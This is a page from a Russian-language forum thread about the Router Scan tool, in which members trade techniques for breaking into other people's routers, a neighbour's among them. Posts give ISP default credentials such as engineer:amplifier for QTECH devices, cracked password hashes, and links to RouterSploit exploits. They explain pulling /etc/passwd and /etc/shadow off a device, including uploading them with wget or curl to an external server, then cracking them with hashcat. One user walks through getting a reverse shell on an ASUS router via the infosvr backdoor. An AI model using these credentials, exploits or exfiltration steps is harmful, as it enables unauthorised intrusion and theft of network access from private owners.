PDA

Просмотр полной версии : прога Router Scan


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

al808
07.05.2017, 23:49
вопрос: имею настроенный по дефолту тплинк admin:admin, если сканировать с локального ИП 192.168.1.1 то конечно РС находит и выдает всю инфу с паролями\\\далее я знаю внешний ИП и соответственно диапазон провайдера\\\сканирую РСном порты 80 8080 1080 8000 (вощем по дефолту) и ничего полезного\\\через cmd делаю трассировку до гугла, идет через внутренний локальный узел провайдера(правильно говорю???) вида 10.ххх.ххх.ххх

Пробую просканировать этот диапазон 10.ххх.ххх.ххх/24 (для начала) - тишина. Куда стоит копать? (точные адреса всех ИП могу скинуть в личку)

Ossen
08.05.2017, 00:16
вопрос: имею настроенный по дефолту тплинк admin:admin, если сканировать с локального ИП 192.168.1.1



в настройках тп линка в безопасность удалённое управление выставите порт 80 и ип 255.255.255.255 и увидишь ты его с внешки

al808
08.05.2017, 00:24
в настройках тп линка в безопасность удалённое управление выставите порт 80 и ип 255.255.255.255 и увидишь ты его с внешки



ну свой я и глазами вижу и пароли знаю- а вот скажем роутер соседа совсем другая история

qwerty_332
08.05.2017, 10:18
ну свой я и глазами вижу и пароли знаю- а вот скажем роутер соседа совсем другая история



Вернись на пару страниц назад, уже писали именно про это с tp-link.

al808
08.05.2017, 13:02
Вернись на пару страниц назад, уже писали именно про это с tp-link.



я не вижу других, у соседа например 100% длинк320, мне тоже на пару страниц вернуться? и да у него admin:admin

а помимо соседа...наверное нас не двое у провайдера и уж точно кто то должен находиться

al808
08.05.2017, 13:09
я проще спрошу: если внутри конкретного провайдера на стандартных портах 80 1080 8080 8000 тишина, какие сканить порты или гиблое дело?

carartem02
08.05.2017, 15:14
я проще спрошу: если внутри конкретного провайдера на стандартных портах 80 1080 8080 8000 тишина, какие сканить порты или гиблое дело?



МТС любит 161

stos
08.05.2017, 18:46
asusЫ не пробивные какие-то! 3wifi PIN + Dumpper в связке хорошо работает! но все ровно по 192.168.1.1 не пробить. Добавил одну точку через ексель, практически рядом показала на карте. Не знаю как это работает, ручками координаты не вбивал!

binarymaster
08.05.2017, 20:35
Добавил одну точку через ексель, практически рядом показала на карте. Не знаю как это работает, ручками координаты не вбивал!



Это магия.

carartem02
08.05.2017, 21:23
все ровно по 192.168.1.1 не пробить



Это как? Мой asus RS берёт хорошо

Kakoluk
08.05.2017, 21:26
Не знаю как это работает, ручками координаты не вбивал!






Это магия.


+ "Достаточно развитая технология, неотличима от магии." (c) Артур Кларк.

khamyk
09.05.2017, 01:34
Почему выскакивает вот это сообщение?

http://i056.radikal.ru/1705/e9/a48f9c7f2d8e.png

Когда добавляю 443 порт

Payer
09.05.2017, 08:40
Почему выскакивает вот это сообщение?



Библиотека старая, обновите DLL.

khamyk
09.05.2017, 10:30
Библиотека старая, обновите DLL.



Поделитесь тогда новым,рабочим DLL пожалуйста.

Payer
09.05.2017, 10:35
Поделитесь тогда новым,рабочим DLL



Насколько подойдет - не знаю.

У меня этот в папке с программой лежит

http://rgho.st/6jf58Ccym

conar
09.05.2017, 15:21
Прошелся по внутреннему диапазону МТС (по внешнемурядом с собой и вывалилась куча QBR-1041WU на 161 порту. Но ни одной доступной. Похоже при установке пров ставит свои пароли. Что-то из ряда d4bf7f55abfd. Печалька ...((( Еще у некоторых Dir-615 выдает :admin то есть пустое имя пользователя с паролем админ... это замечено на роутерах где интерфейс веб морды выбран на русском.

И оказывается МТС любители повыдавать даже зарубежные IP. Например соседский сейчас числится в канаде. Провайдер OVH. И как их блин искать после этого... Хотя все рано на роутерах включен NAT и достать можно только во внутренней сети.

sha9
09.05.2017, 17:19
еще одна интересная разработка для пентеста роутеров

https://github.com/devilscream/litesploit

благое дело не стоит на месте. только провы массово начали менять настройки роутеров клиентам ( у нас во всяком случае) :-( результаты сканирования все меньше и меньше...сникерсы доигрались...

binarymaster
09.05.2017, 17:44
И оказывается МТС любители повыдавать даже зарубежные IP. Например соседский сейчас числится в канаде. Провайдер OVH. И как их блин искать после этого...



А вот это вряд ли, тут скорее на роутере VPN-клиент настроен.

carartem02
09.05.2017, 17:57
благое дело не стоит на месте



Но последняя правка была 10 апреля 2016. Если такой прогресс ожидается у всех, то будет ..

http://i9.youcomedy.me/d/a/big_eaea22498a31534048e9a4154f0344ad.jpg

conar
09.05.2017, 18:32
А вот это вряд ли, тут скорее на роутере VPN-клиент настроен.



Нет. Ничего не такого нет. Смотрел на веб морде. Народ там лох. И как поставили admin:admin так и стоит.

conar
09.05.2017, 18:36
Но последняя правка была 10 апреля 2016. Если такой прогресс ожидается у всех, то будет ..

http://i9.youcomedy.me/d/a/big_eaea22498a31534048e9a4154f0344ad.jpg


Извиняюсь за офтоп это по какой теме?

Kakoluk
09.05.2017, 21:34
Прошелся по внутреннему диапазону МТС (по внешнемурядом с собой и вывалилась куча QBR-1041WU на 161 порту. Но ни одной доступной. Похоже при установке пров ставит свои пароли. Что-то из ряда d4bf7f55abfd. Печалька ...((( Еще у некоторых Dir-615 выдает <empty>:admin то есть пустое имя пользователя с паролем админ... это замечено на роутерах где интерфейс веб морды выбран на русском.

И оказывается МТС любители повыдавать даже зарубежные IP. Например соседский сейчас числится в канаде. Провайдер OVH. И как их блин искать после этого... Хотя все рано на роутерах включен NAT и достать можно только во внутренней сети.



У вас есть прошивка роутеров вашей сети(пусть даже не самая последняя)?

Может кто нибудь считать флеш с искомого роутера? Например выпаяв микросхему(флешку) и считать програматором? Поиметь дамп бы очень не плохо, ведь всегда найдутся светлые головы для анализа. И помощи.

hunt.lsk
10.05.2017, 01:08
Не парсит Asus RT-N66U

https://217.175.0.90:8443

sha9
10.05.2017, 10:10
У вас есть прошивка роутеров вашей сети(пусть даже не самая последняя)?

Может кто нибудь считать флеш с искомого роутера? Например выпаяв микросхему(флешку) и считать програматором? Поиметь дамп бы очень не плохо, ведь всегда найдутся светлые головы для анализа. И помощи.



зачем выпаивать?

http://www.qtech.ru/catalog/archwifirouters/222/manuals.htm

тут прошивки. даже две. вчера скачал и смотрел.распаковываются архиватором.

sha9
10.05.2017, 10:19
Но последняя правка была 10 апреля 2016. Если такой прогресс ожидается у всех, то будет ..



ну можно и продолжить это дело. было-бы желание. начало положено. кстати, этот софт не заточен только под роутеры. это скорее была попытка создания унискана. там эксплойты и под линь и под веб. что (ИМХО) не помешало-бы и нашему роутерскану. тем более, что он все равно парсит и веб, и сервера. только не пробивает на уязвимости. было-бы не плохо добавить и эту фичу точнее не добавить ( в сущности она уже есть), а более развить

startless
10.05.2017, 10:41
ну можно и продолжить это дело. было-бы желание. начало положено. кстати, этот софт не заточен только под роутеры. это скорее была попытка создания унискана. там эксплойты и под линь и под веб. что (ИМХО) не помешало-бы и нашему роутерскану. тем более, что он все равно парсит и веб, и сервера. только не пробивает на уязвимости. было-бы не плохо добавить и эту фичу точнее не добавить ( в сущности она уже есть), а более развить


Думаю, будет лишним. Лучше реализовать отдельный инструмент, чем городить унискан.

carartem02
10.05.2017, 11:58
там эксплойты и под линь и под веб. что (ИМХО) не помешало-бы и нашему роутерскану



Тогда это перестанет быть роутер сканом

sha9
10.05.2017, 14:06
Думаю, будет лишним. Лучше реализовать отдельный инструмент, чем городить унискан.



в принципе, как я понял, изначально задумка была. ведь в настройках сканирования есть phpmyadmin и sql... просто они на данный момент не работают. и кстати, метасплойт тоже универсален, и ничего. пользуется большим спросом...отдельный инструмент - это хорошо. но один инструмент-это один инструмент, а, как говорится 3 в одном - интереснее и авторитетней не нужно запускать несколько программ для каждого случая...запустил и работай.не отвлекайся... тем более, что интеллектуальный потенциал у роутерскана огромный , да и популярности ему не занимать (судя по суетливому шурованию сисадминов и провайдеров)



Тогда это перестанет быть роутер сканом


ну и что, разве суть в названии? многие начинали с ручейка, а выходили на большие воды. начинали с одного, а выходили на что-то более мощное. если вспомним тот же метасплойт в самом начале его пути. серьезное изменение пошло с приходом Мэтта Миллера (если не ошибаюсь) и новой политикой метасплойта. да таже самая винда. поначалу была всего лишь удобным инструментом дос. а перешла в целую операционную систему, первую по популярности

п.с. это все ИМХО

binarymaster
10.05.2017, 15:25
Доп. модули сканирования-то есть, вот только не вижу смысла городить их ещё больше, т.к. они не подключаемые, а встроенные. А ещё многие любят ставить все возможные галки, чтоб соседа ломануло наверняка!

conar
10.05.2017, 15:46
Может быть можно реализовать что-бы результаты сканирования сохранялись в отдельную папку? Например создавалась бы папка history и в нее уже сохранялись результаты...

stos
10.05.2017, 15:50
Это как? Мой asus RS берёт хорошо



12 и 14 и другие модели, методом RS не поддается, если старая прошивка то может быть! Только если pass.txt иметь хороший, там пароль не стандартный! гидра работает по подбору со словарем рокЮ.тхт, но это долго. metasploit нету нечего по асусам только н16 и еще какой-то.

conar
10.05.2017, 16:09
Да с Asus какая-то засада прям (((

binarymaster
10.05.2017, 16:28
Не парсит Asus RT-N66U

https://217.175.0.90:8443



Кстати говоря, нет соединения. Страница не открывается.

sha9
10.05.2017, 18:32
Кстати говоря, нет соединения. Страница не открывается.



удаленное управление скорее всего отключено. порт открыт, но не соединяет

binarymaster
10.05.2017, 19:15
https://github.com/reverseshell/rou...exploits/routers/asus/infosvr_backdoor_rce.py



Page not found



п.с. тут тоже интересный эксплойт взлома асус 3200



Судя по названию эксплойта, как-то связано с HTTP заголовком Accept-Language.

sha9
10.05.2017, 19:24
Page not found


а так? вроде работает. проверил 3 раза

https://github.com/reverse-shell/ro...ts/routers/asus/rt_n16_password_disclosure.py

binarymaster
10.05.2017, 19:30
а так? вроде работает. проверил 3 раза

https://github.com/reverse-shell/ro...ts/routers/asus/rt_n16_password_disclosure.py



Так это ж наш любимый /error_page.htm!

Который уже не помню сколько лет назад добавлен.

Вот тот эксплойт на видео мне понравился больше, им должны быть охвачены все прошивки 2.0.

sha9
10.05.2017, 19:36
Так это ж наш любимый /error_page.htm!

Который уже не помню сколько лет назад добавлен.

Вот тот эксплойт на видео мне понравился больше, им должны быть охвачены все прошивки 2.0.



так таки вы правы. я в курсе, что вы правы. но товарищ сказал, что только на 16-е есть. а там наглядно указан еще ряд роутеров. может ему пригодится для исследования

п.с. я всегда стоял за прогресс и постоянное самообразование сам до сих пор учусь и стараюсь узнать что-то новое

hunt.lsk
10.05.2017, 20:04
Страница не открывается



видно отключен от сети,если попадется это чудо - выложу тут

fffsfs
10.05.2017, 20:08
Какие порты нужно вводить в программу кроме 80,8080,1080?

binarymaster
10.05.2017, 20:12
Какие порты нужно вводить в программу кроме 80,8080,1080?



http://image.prntscr.com/image/ba60f9b718684660a7b930c4e0f6231f.png

fffsfs
10.05.2017, 20:20
http://image.prntscr.com/image/ba60f9b718684660a7b930c4e0f6231f.png


Спасибо

cheburactor
11.05.2017, 01:13
Как оказалось нужно дублировать автоматическую загрузку.

Ради интереса слил все файлы в один, удалил дубликаты строк и залил на 3WiFi.

Еще тыщёнка точечек образовалась

CRACK211
11.05.2017, 01:16
Как оказалось нужно дублировать автоматическую загрузку.

Ради интереса слил все файлы в один, удалил дубликаты строк и залил на 3WiFi.

Еще тыщёнка точечек образовалась


А не могло быть так что пока вы чистили в некоторых строках что то поменялось? Например нули пропали вначале?

Через какую программу открывали файлы ?

startless
11.05.2017, 05:15
Сканил, тут значит, сканил

Выводы)

Результаты в основном на карте 3wifi, все от 2015-16 года уже есть, добавлял новые AP (хорошо если с десяток новых точек из 1000 найденых будет в гуде),

остается надеятся, если кто купит лохматый роутер с рук "попереломанный" (все старьё уже есть в базе RS) и появится в сети.

Коллеги из всях там "Мухосрансков" (без обид) меня поддержат, сканию столицу как в том числе и регионы, ибо такие вот выводы даже с последним обновлением.



Я сам из "мухосранска". Сканю свой регион регулярно и могу сказать, что новые точки регулярно появляются. Раньше провайдеры ставили населению сагемкомы, потом ZTE, а сейчас куча хуавеев появилась.

По-поводу появления точек на карте 3wifi я уже постил, что все твоих руках - wigle врубаешь и вперед! Хочешь пешком, хочешь на велике, можно на дрон прицепить и облететь район, можно на свою кошку (они везде лазят). В машине ездишь по городу - брось смартфон на панельку под лобовуху. Больше точек добудешь - больше вероятность их появления на карте 3wifi!

conar
11.05.2017, 08:00
Я сам из "мухосранска". Сканю свой регион регулярно и могу сказать, что новые точки регулярно появляются. Раньше провайдеры ставили населению сагемкомы, потом ZTE, а сейчас куча хуавеев появилась.

По-поводу появления точек на карте 3wifi я уже постил, что все твоих руках - wigle врубаешь и вперед! Хочешь пешком, хочешь на велике, можно на дрон прицепить и облететь район, можно на свою кошку (они везде лазят). В машине ездишь по городу - брось смартфон на панельку под лобовуху. Больше точек добудешь - больше вероятность их появления на карте 3wifi!



Ну я поднимал вопрос как найти точку по диапазону. Ну получил я пароль от нее через hashcat. И правда МТС свои роутеры отключает от всего. Спасибо тут кто-то сказал что мтс любит 161 порт. Поосканил локалку чуть-чуть. Да на 161 полно. Стандартные dlink zte пароли как правило по умолчанию. Просто у нас кто хоть чуть чуть в нете шарит мтс никогда не подключит. А вот QBR куча но доступа нет. Из за того что при первом включении они требую сразу поменять пароль... Один нашелся где пароль поставили admin:admin Причем отладчик гугловский ругается что типа пароли хранятся в теле фрейма в открытом виде. Научится бы при загрузке страницы вырезать на лету что касается авторизации... Если кто в курсе "пните" в нужную сторону.....

fffsfs
11.05.2017, 09:13
Ты не рекордсмен, у меня в свое время при подобном раскладе мульён "точечек" в свое время был, обидно что не отразилось на карте )



У меня находятся точки на Зеленая,(далеко, возле аэропорта) и слилась точка с которой сканил(жаль). Нашла только 1 и то раньше дней 10 назад был только BSSID, ESSID но без пароля, вчера сотрю есть пароль) но еще ее не проверял.

Может кому то выдать диапазоны, и он просканит? У меня 10 точек от всего огромного диапазона нашло, которые я не знаю причем.

ugoday
11.05.2017, 09:18
В таких бы ECI B-FOCuS 0-4G2PW, цепляла пароль а то пропускает, да и так к веб морде не подключиться а telnet и ssh только если отключить от оптики. Или кто знает способ другой?

Felis-Sapiens
11.05.2017, 10:07
qtech:$1$c6Qv.1e0$FOJSfT1QEEunaQaVfzZuS.:0:0:root:/:/bin/sh



$1$c6Qv.1e0$FOJSfT1QEEunaQaVfzZuS.:123456

sha9
11.05.2017, 10:10
$1$c6Qv.1e0$FOJSfT1QEEunaQaVfzZuS.:123456


Felis-Sapiens как всегда приходит на помощь в самое нужное время рад вас видеть. давно не наблюдал здесь

stos
11.05.2017, 18:35
заметил что асусы на порте не только на 80 и на 18017. (

Heur: http

Server: wanduck

GET Response: 302 Moved Temporarily)

Связка RS + Intercepter-NG мне показала что словарь на auth_basic.txt работает не весь. Прошу проверить мои догадки. Intercepter-NG в разделе password mode + show cockies

Kakoluk
11.05.2017, 23:09
$1$c6Qv.1e0$FOJSfT1QEEunaQaVfzZuS.:123456





$1$S3IVv.Qr$c9j8g3Yc8o/MtH3NV5Mcw/: qtechsupport


А вот насколько они легитимные, не для отвода ли глаз... Дело в том, что когда разбирал FS, довесок не распаковался.

А в нем, возможно, что то ещё полезное есть.

Felis-Sapiens
12.05.2017, 00:01
А вот насколько они легитимные, не для отвода ли глаз... Дело в том, что когда разбирал FS, довесок не распаковался.

А в нем, возможно, что то ещё полезное есть.



123456 - это старый пароль (он в файле ~passwd). qtechsupport - должен быть действительным. Только надо понимать, что это не пароль от веб-интерфейса, а пароль пользователя qtech (рута). У этих роутеров есть доступ по ssh или telnet?

Kakoluk
12.05.2017, 00:05
123456 - это старый пароль (он в файле ~passwd). qtechsupport - должен быть действительным. Только надо понимать, что это не пароль от веб-интерфейса, а пароль пользователя qtech (рута). У этих роутеров есть доступ по ssh или telnet?



Да вот тут писали: https://forum.antichat.ru/threads/398971/page-174#post-4082023 .

Буду(будем) ждать что скажет.

...

Для QTECH QBR-1041WU, ни в ростелекомовской, ни в mts-овской прошивке, кроме 161(SNMP) и 4999(HFCS-manager) ничего не простукивается. Скорее всего, и на том диапазоне ничего нового не откроется.

resident148
12.05.2017, 02:19
от 161 порта QBR-1041WU мтс пароль engineer:amplifier, только сегодня по внутренним адресам 1000 точек новых залил на 3wifi. Вот только юзать его надо принудительно

conar
12.05.2017, 16:38
Может не совсем новость, но по поводу asus, 9 мая выложили новые уязвимости... Обновление прошивки вышло только в этом марте. И врядтли 90 процентов народа будут сразу обновляться. 40 моделей в списке. https://xakep.ru/2017/05/11/asus-rt-problems/

binarymaster
12.05.2017, 17:18
Может не совсем новость, но по поводу asus, 9 мая выложили новые уязвимости... Обновление прошивки вышло только в этом марте. И врядтли 90 процентов народа будут сразу обновляться. 40 моделей в списке. https://xakep.ru/2017/05/11/asus-rt-problems/



The endpoints are as follows:


/findasus.json

Returns the router model name, SSID name and the local IP address of the router

iAmAlive([{model?Name: “XXX”, ssid: “YYY”, ipAddr: “ZZZZ”}])



/httpd_check.json

Returns: {“alive”: 1, “isdomain”: 0}

[router IP]/WPS_info.xml



а также опасная RCE-уязвимость (CVE-2017-6548).



А эта только из LAN:

https://www.exploit-db.com/exploits/41573/

hunt.lsk
13.05.2017, 00:17
https://5.101.213.174:8443/

Не парсит роутер

conar
13.05.2017, 01:13
https://5.101.213.174:8443/

Не парсит роутер



Так это Asus...

hunt.lsk
13.05.2017, 01:16
Так это Asus



Да, но прога его не определяет

conar
13.05.2017, 02:20
Скорее всего из за того что вход через ssl. Да даже если определит.... Хотя в списке уязвимых (тех которые выложены были 9 мая) он есть, но рабочего эксплойта для routersploit что-то не светится.... Или плохо искал

Наткнулся на видео об эксплоите для RT-АС3200, но честно говоря ничего из этого видео не понял.....

binarymaster
13.05.2017, 12:29
Да, но прога его не определяет



Всё определяет:


Address: https://5.101.213.174:8443/
Time: 125 ms
Device: ASUS RT-AC3200, firmware: 2.0
BSSID: 1C:B7:2C:86:21:50
ESSID: 319
Или там есть корректный логин?



Наткнулся на видео об эксплоите для RT-АС3200, но честно говоря ничего из этого видео не понял.....



А чего там непонятного, RCE эксплойт сливает nvram во временный файл.

conar
13.05.2017, 14:49
Действительно у QBR-1041WU у всех engineer:amplifier да еще и wps-pin всего два варианта.

hunt.lsk
13.05.2017, 21:53
Всё определяет



Жаль а у меня не определяет.Из-за чего может быть?

binarymaster
14.05.2017, 15:36
Жаль а у меня не определяет.Из-за чего может быть?



Попробуйте обновить библиотеки OpenSSL (libeay32 / ssleay32).



31.40.97.119:81 81 порт

мда



Микротик, запароленный. Что-то интересное обнаружили?

hunt.lsk
14.05.2017, 16:15
Где их скачать дайте ссылку

libeay32 есть/ ssleay32 нет в проге

mazik
14.05.2017, 17:07
дайте ссылку



http://www.dlldump.com/download-dll-files_new.php/dllfiles/L/libeay32.dll/-/download.html

http://www.dlldump.com/download-dll-files_new.php/dllfiles/S/ssleay32.dll/-/download.html

https://sourceforge.net/projects/openssl/files/latest/download

malik
14.05.2017, 19:20
Здравствуйте ! Не подскажите где можно обнаружить ссылку на последнюю версию

Router Scan ?

Triton_Mgn
14.05.2017, 19:23
Посмотрите 50 последних страниц.

malik
14.05.2017, 19:47
на 125 стр это последняя или продолжать изыскания ?

binarymaster
14.05.2017, 19:55
на 125 стр это последняя или продолжать изыскания ?



Как-то далеко вы заехали.

https://forum.antichat.ru/posts/4079071

malik
14.05.2017, 20:05
СПАСИБО

ЗАПУСК НЕ ВОЗМОЖЕН ОТСУТСТВУЕТ LIBEAY32.DLL ЭТО ЧТО ?

conar
14.05.2017, 20:28
Скачиваешь оригинал. 2.53 версия. Распаковываешь. Файлы из архива по выше приведенной ссылке распаковываешь в папку с распакованной 2.53 с заменой файлов. И все...

conar
15.05.2017, 02:30
И что значит мда?

Гдето на страницах я натыкался что эксплоиты расчитанные на использование внутри локалки не добавляются. Возможно зря. Например через внешний IP доступен один порт, а при сканирование того-же роутера внутри сети прова открыты еще 5 разных портов. Конечно иногда толку от них ноль. Но иногда через внешний IP telnet не доступен, а при сканирование по внутренней сети доступ к нему есть. Возможно стоит добавлять и эксплоиты расчитанные на работу внутри сети. А вдруг сработают. Ведь внутренняя сеть прова почти локалка...

binarymaster
15.05.2017, 11:23
Ведь внутренняя сеть прова почти локалка...



Именно, что почти. Роутеры к ней по WAN порту подключены, а доступ к локальным уязвимостям только через LAN порты.

Для добавления таких эксплойтов нужна определённая среда для их тестирования (нахождение внутри сети уязвимого роутера), которой обычно не предоставляется.

conar
15.05.2017, 13:45
Ну добровольцев найти не проблемма скорее всего. К 4 внутренним сетям есть доступ. Билайн Мтс Ростелеком Дом.ру. Но всетаки странно. Когда с qtech копался наткнулся на достаточно много zte c неизвестными данными. С внешки только 161 порт. Из нутри сети доступен еще 23, доступ к нему у всех root:root. А несколько кенетиков так вообще для телнет пароль не спрашивают. Немножко не в тему, каким образом из файла passwd пароли вытаскиваются?

cheburactor
15.05.2017, 14:11
Локалки самые сладкие места оказались. Надо планшет или малинку с win



Ну добровольцев найти не проблемма скорее всего. К 4 внутренним сетям есть доступ. Билайн Мтс Ростелеком Дом.ру. Но всетаки странно. Когда с qtech копался наткнулся на достаточно много zte c неизвестными данными. С внешки только 161 порт. Из нутри сети доступен еще 23, доступ к нему у всех root:root. А несколько кенетиков так вообще для телнет пароль не спрашивают. Немножко не в тему, каким образом из файла passwd пароли вытаскиваются?



В локалке тоже не все просто. У меня пол дома в ней. И что? Ничего У всех IP из диапазона 192.168.0.0/16,

но они в другой подсети.

conar
15.05.2017, 14:19
Ну я просто подключаюсь к соседским точкам и уже через них скан их внутренних сетей идет...

binarymaster
15.05.2017, 14:40
Немножко не в тему, каким образом из файла passwd пароли вытаскиваются?



cat /etc/passwd

А дальше если пароль хеширован - брутить hashcat'ом либо john the ripper'ом. Если в файле нет хешей, смотреть в другом - /etc/shadow

conar
15.05.2017, 14:51
cat /etc/passwd

А дальше если пароль хеширован - брутить hashcat'ом либо john the ripper'ом. Если в файле нет хешей, смотреть в другом - /etc/shadow



Это то примерно понятно. Просто раньше телнетом не приходилось пользоваться. Как эти файлы на комп скачать.....

binarymaster
15.05.2017, 14:57
Это то примерно понятно. Просто раньше телнетом не приходилось пользоваться. Как эти файлы на комп скачать.....



Если простого cat недостаточно, можно попробовать uuencode:

https://stackoverflow.com/questions/2062834/

https://unix.stackexchange.com/questions/171456/

Ещё вариант использовать wget (либо curl - но он редко встречается) для выгрузки файлов на внешний сервер.

А вот с SSH обычно проще, достаточно установить соединение по SFTP.

binarymaster
15.05.2017, 15:17
helei10067407:$1$nNWElzjs$KKzTdxB0VgFme5n71yust/:12086::99999::::



Брутить это.

conar
15.05.2017, 15:19
Просто создавать текстовый файл с этим содержимым и подсовывать hashcat?

dfcz74
15.05.2017, 18:04
Здравствуйте ! Не подскажите где можно обнаружить ссылку на последнюю версию

Router Scan ?


http://rgho.st/6RPDWr972

stos
15.05.2017, 19:16
cat /etc/passwd .... и многое другое.

И так поехали. Доступ к Своей точки wifi получен как не странно не кали и не вайфайслакс, а банально 3wifi + dumpper.

Дальше админка к роутеру. Асус стандартный логин пароль не подходит... burp вроде что то нашел, но странный пароль(blablabla). подумал что это бред... admin:BlaBlaba не зашел. Маленькая программа AsusPWN.exe тоже выдавала blablabla, подумал опять бред. admin:blablabla так и не заходит. owasp-zap. - тоже мало чего говаривала так же как и burp.

hydra работата по -admin : pass.dis. - без успешно. подумал что словарь скорее всего надо искать по номеру телефону 90....

asus habrahabr - 3 темы все перечитал... подходи все, но не у меня! asusCMD и блаБлабла

routersploit/infosvr_backdoor_rce.py - RouterSploit!!! много раз пробывал нечего нету. Потом все таки о чудо... infosvr заработал. reverce_tcp прописал 192.168.2.121 4445. Доступ получен cmd ->

cmd -> тут началось интересное telnet со всеми правами. Многое пересмотрел нечего не нашел. NVRAM. cat /etc/passwd. бредовый фаил... где не написано нечего интересного. Root:::xx:::: NAS::_::: и так далеее. Не нашел в нем это admin:blablabla. ls -la в название устройства было не admin - а другое имя, тут я призадумался. PussyLOgin. - это наш admin???.

Дальше routersploit/infosvr_backdoor_rce.py - сломался!!! больше не смог добраться до него, видимо засрал оперативку командами..

Командная строка урезанная, CMD>. Многие команды не работали. Много информации так и не смог собрать. nvram show | grep и т.д мала что выдавало.

Nmap привет. как не странно я видел порты с telnetом, но не обратил внимание. Порт был открыт 3х значный. проверил putty, о чудо busybox. без логина и пароля. sysinfo есть что почитать. cat /etc/passwd... тоже нечего интересное. И всетаки NVRAM опять к нему.

nvram show - много чего вкусного и wifi...

nvram show | grep admin - acc_list=admin>jhfdsfhjkBLA (wifi pass) * acc_webdavproxy=admin>1

хм а где жу PussyLogin? ....

nvram show | grep http - о да. http_username=PussyLogin * http_lanport=65533 (хз) * http_passwd=blablabla

тут стало ясно asusPWD и burp со своим error_page.htm давали мне пароль, но не говарили мне логин нормальный.

пользовался:

https://habrahabr.ru/post/230469/

https://habrahabr.ru/post/253013/

http://mycyberuniverse.com/ru/linux/full-controling-the-asus-router-via-command-line.html

http://www.foxnetwork.ru/index.php/component/content/article/134-asus-rt-n14u.html - самая полезная ссылка

conar
15.05.2017, 20:36
cat /etc/passwd .... и многое другое.

И так поехали. Доступ к Своей точки wifi получен как не странно не кали и не вайфайслакс, а банально 3wifi + dumpper.

Дальше админка к роутеру. Асус стандартный логин пароль не подходит... burp вроде что то нашел, но странный пароль(blablabla). подумал что это бред... admin:BlaBlaba не зашел. Маленькая программа AsusPWN.exe тоже выдавала blablabla, подумал опять бред. admin:blablabla так и не заходит. owasp-zap. - тоже мало чего говаривала так же как и burp.

hydra работата по -admin : pass.dis. - без успешно. подумал что словарь скорее всего надо искать по номеру телефону 90....

asus habrahabr - 3 темы все перечитал... подходи все, но не у меня! asusCMD и блаБлабла

routersploit/infosvr_backdoor_rce.py - RouterSploit!!! много раз пробывал нечего нету. Потом все таки о чудо... infosvr заработал. reverce_tcp прописал 192.168.2.121 4445. Доступ получен cmd -><br/>
cmd -> тут началось интересное telnet со всеми правами. Многое пересмотрел нечего не нашел. NVRAM. cat /etc/passwd. бредовый фаил... где не написано нечего интересного. Root:::xx:::: NAS::_::: и так далеее. Не нашел в нем это admin:blablabla. ls -la в название устройства было не admin - а другое имя, тут я призадумался. PussyLOgin. - это наш admin???.<br/>
Дальше routersploit/infosvr_backdoor_rce.py - сломался!!! больше не смог добраться до него, видимо засрал оперативку командами..<br/>
Командная строка урезанная, CMD>. Многие команды не работали. Много информации так и не смог собрать. nvram show | grep и т.д мала что выдавало.<br/>
<br/>
Nmap привет. как не странно я видел порты с telnetом, но не обратил внимание. Порт был открыт 3х значный. проверил putty, о чудо busybox. без логина и пароля. sysinfo есть что почитать. cat /etc/passwd... тоже нечего интересное. И всетаки NVRAM опять к нему.<br/>
<br/>
nvram show - много чего вкусного и wifi...<br/>
nvram show | grep admin - acc_list=admin>jhfdsfhjkBLA (wifi pass) * acc_webdavproxy=admin>1<br/>
хм а где жу PussyLogin? ....<br/>
nvram show | grep http - о да. http_username=PussyLogin * http_lanport=65533 (хз) * http_passwd=blablabla<br/>
тут стало ясно asusPWD и burp со своим error_page.htm давали мне пароль, но не говарили мне логин нормальный.

пользовался:

https://habrahabr.ru/post/230469/

https://habrahabr.ru/post/253013/

http://mycyberuniverse.com/ru/linux/full-controling-the-asus-router-via-command-line.html

http://www.foxnetwork.ru/index.php/component/content/article/134-asus-rt-n14u.html - самая полезная ссылка



Много БУКАФ. Модель роутера какая? А насчет кали и всего остального за две недели активного обучения пользования ни один роутер даже ломаный roгter scan не сдался. С учетом того что эксплойты есть. Вывод, просто так ничего не бывает. Иначе тот-же кали это как дать обезьяне гранату... Я сам снова (после начала 2000х) учусь потихоньку... Модель роутера в студию....

stos
15.05.2017, 23:10
Много БУКАФ. Модель роутера какая? А насчет кали и всего остального за две недели активного обучения пользования ни один роутер даже ломаный roгter scan не сдался. С учетом того что эксплойты есть. Вывод, просто так ничего не бывает. Иначе тот-же кали это как дать обезьяне гранату... Я сам снова (после начала 2000х) учусь потихоньку... Модель роутера в студию....



n14u.

a.forregs
16.05.2017, 23:22
Доп. модули сканирования-то есть, вот только не вижу смысла городить их ещё больше, т.к. они не подключаемые, а встроенные. А ещё многие любят ставить все возможные галки, чтоб соседа ломануло наверняка!



угу. только для этого давно пора с паскаля слезать. а малварь и незаметно можно встроить. а не как сейчас.

a.forregs
16.05.2017, 23:47
cat /etc/passwd .... и многое другое.

И так поехали. Доступ к Своей точки wifi получен как не странно не кали и не вайфайслакс, а банально 3wifi + dumpper.

Дальше админка к роутеру. Асус стандартный логин пароль не подходит... burp вроде что то нашел, но странный пароль(blablabla). подумал что это бред... admin:BlaBlaba не зашел. Маленькая программа AsusPWN.exe тоже выдавала blablabla, подумал опять бред. admin:blablabla так и не заходит. owasp-zap. - тоже мало чего говаривала так же как и burp.

hydra работата по -admin : pass.dis. - без успешно. подумал что словарь скорее всего надо искать по номеру телефону 90....

asus habrahabr - 3 темы все перечитал... подходи все, но не у меня! asusCMD и блаБлабла

routersploit/infosvr_backdoor_rce.py - RouterSploit!!! много раз пробывал нечего нету. Потом все таки о чудо... infosvr заработал. reverce_tcp прописал 192.168.2.121 4445. Доступ получен cmd -><br/>
cmd -> тут началось интересное telnet со всеми правами. Многое пересмотрел нечего не нашел. NVRAM. cat /etc/passwd. бредовый фаил... где не написано нечего интересного. Root:::xx:::: NAS::_::: и так далеее. Не нашел в нем это admin:blablabla. ls -la в название устройства было не admin - а другое имя, тут я призадумался. PussyLOgin. - это наш admin???.<br/>
Дальше routersploit/infosvr_backdoor_rce.py - сломался!!! больше не смог добраться до него, видимо засрал оперативку командами..<br/>
Командная строка урезанная, CMD>. Многие команды не работали. Много информации так и не смог собрать. nvram show | grep и т.д мала что выдавало.<br/>
<br/>
Nmap привет. как не странно я видел порты с telnetом, но не обратил внимание. Порт был открыт 3х значный. проверил putty, о чудо busybox. без логина и пароля. sysinfo есть что почитать. cat /etc/passwd... тоже нечего интересное. И всетаки NVRAM опять к нему.<br/>
<br/>
